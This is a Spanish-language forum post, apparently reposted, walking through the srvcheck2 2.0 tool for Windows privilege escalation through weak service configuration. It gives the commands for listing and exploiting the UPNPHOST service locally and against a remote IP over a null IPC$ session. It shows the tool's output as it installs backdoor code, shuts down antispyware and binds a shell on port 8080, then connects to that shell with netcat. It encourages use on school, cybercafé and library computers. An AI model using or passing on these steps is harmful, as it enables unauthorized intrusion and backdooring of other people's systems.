Buenas, desde hace unos dias la web de
Para ver este enlace Registrate o Inicia Sesion nos ofrece un nuevo exploit que se basa en una debil configuración de los servicios de windows para elevar los privilegios de forma local.
Ahora ha salido la versión 2.0 que permite una elevación de privilegios tanto local como remota, el funcionamiento es el siguiente:
Descargamos el archivo de su web oficial y ejecutamos en nuestro PC el comando siguiente:
Código:
srvcheck2 -l
Esto nos listará todos los servicios que tengamos en nuestro PC vulnerables a este exploit. Para el caso buscaremos el servicio UPNPHOST y lo explotaremos con el comando:
Código:
srvcheck2 -m upnphost
Despues de unos segundos el exploit nos responderá algo asi como:
Código:
- Trying to enumerate local resources
- Username: MadAntrax
- Uninstalling previous backdoors
- Granting Remote bindshell Execution..
- Shutting down remote antispyware Service =)
- Installing Backdoor Code...
- The service have been succesfully modified =)
- Service Opened. Trying to Start... (wait a few seconds)
- StarteService() Error due to a non service application execution
- Ignore it. Your application should be executed =)
- Now connect to port 8080 and enjoy your new privileges
Con esto conseguimos bindear una shell a nuestro puerto local 8080. Usaremos NetCat para conectarnos:
Código:
nc 127.0.0.1 8080
Y nos saltará un prompt con los privilegios elevados.
========================
Ok, hasta aqui todo funciona de maravilla y podemos usar este ejemplo para elevar nuestros privilegios en las situaciones que lo requiera (En el colegio, cibercafés, bibliotecas, etc...)
Ahora quiero usar la funcionalidad extra de la version 2.0, que permite explotar un servicio de forma remota, según el archivo de ayuda se hace con el comando:
Código:
srvcheck2 -l -H 81.61.100.2
Con esto podremos hacer un listado de los servicios vulnerables que tiene la maquina 81.61.100.2. Para ello establece una sesión nula IPC$ en el host remoto.
Despues tendremos que poner el comando:
Código:
srvcheck2 -H 81.61.100.2 -m upnphost
Y el exploit nos responderá:
Código:
- Trying to connect to remote SCM
- Host: \\81.61.100.2\IPC$
- Username: (null)
- Password: (null)
- Network Connection OK
- Uninstalling previous backdoors
- Granting Remote bindshell Execution..
- Shutting down remote antispyware Service =)
- Installing Backdoor Code...
- The service have been succesfully modified =)
- Service Opened. Trying to Start... (wait a few seconds)
- StarteService() Error due to a non service application execution
- Ignore it. Your application should be executed =)
- Now connect to port 8080 and enjoy your new privileges
y podremos hacer NetCat en el host remoto con privilegios elevados.
yo no hice este pequeño manual de elevar privilegios por medio de un exploit pero te puede servir...
